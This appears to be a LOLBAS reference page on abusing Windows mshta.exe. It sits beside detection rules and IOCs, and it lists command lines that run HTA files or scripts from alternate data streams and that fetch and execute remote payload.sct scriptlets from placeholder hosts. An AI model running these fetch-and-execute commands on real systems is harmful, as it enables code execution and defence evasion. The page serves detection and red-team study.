.. /Mshta.exe
Star

Used by Windows to execute html applications. (.hta)

Paths:

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Resources:

Acknowledgements:

Casey Smith (@subtee)
Oddvar Moe (@oddvarmoe)
Nir Chako (Pentera) (@C_h4ck_0)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml
Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml
Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml
Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml
Elastic: https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml
Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml
Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml
Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml
Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml
Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml
Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml
BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
IOC: mshta.exe executing raw or obfuscated script within the command-line
IOC: General usage of HTA file
IOC: msthta.exe network connection to Internet/WWW resource
IOC: DotNet CLR libraries loaded into mshta.exe
IOC: DotNet CLR Usage Log - mshta.exe.log

Execute

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
```
mshta.exe evilfile.hta
```
Use case
Execute code

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1218.005

Tags
Execute: WSH
This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.
Executes VBScript supplied as a command line argument.
```
mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
```
Use case
Execute code

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1218.005
Executes JavaScript supplied as a command line argument.
```
mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
```
Use case
Execute code

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1218.005

Alternate data streams

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
```
mshta.exe "C:\ads\file.txt:file.hta"
```
Use case
Execute code hidden in alternate data stream

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)

ATT&CK® technique
T1218.005

Tags
Execute: WSH
This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

Download

It will download a remote payload and place it in INetCache.
```
mshta.exe https://example.com/payload
```
Use case
Downloads payload from remote server

Privileges required
User

Operating systems
Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

ATT&CK® technique
T1105

Tags
Download: INetCache
INetCache downloaders typically store files in a randomly-named folder under %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE, having added [1] or a higher number between the file's name and its extension.
If you downloaded a file named XYZ.exe, the full path of the downloaded file can be obtained by executing the following command:
cmd.exe /c "where /r %LOCALAPPDATA%\Microsoft\Windows\INetCache XYZ*"

.. /Mshta.exe Star

Execute

Alternate data streams

Download

.. /Mshta.exe
Star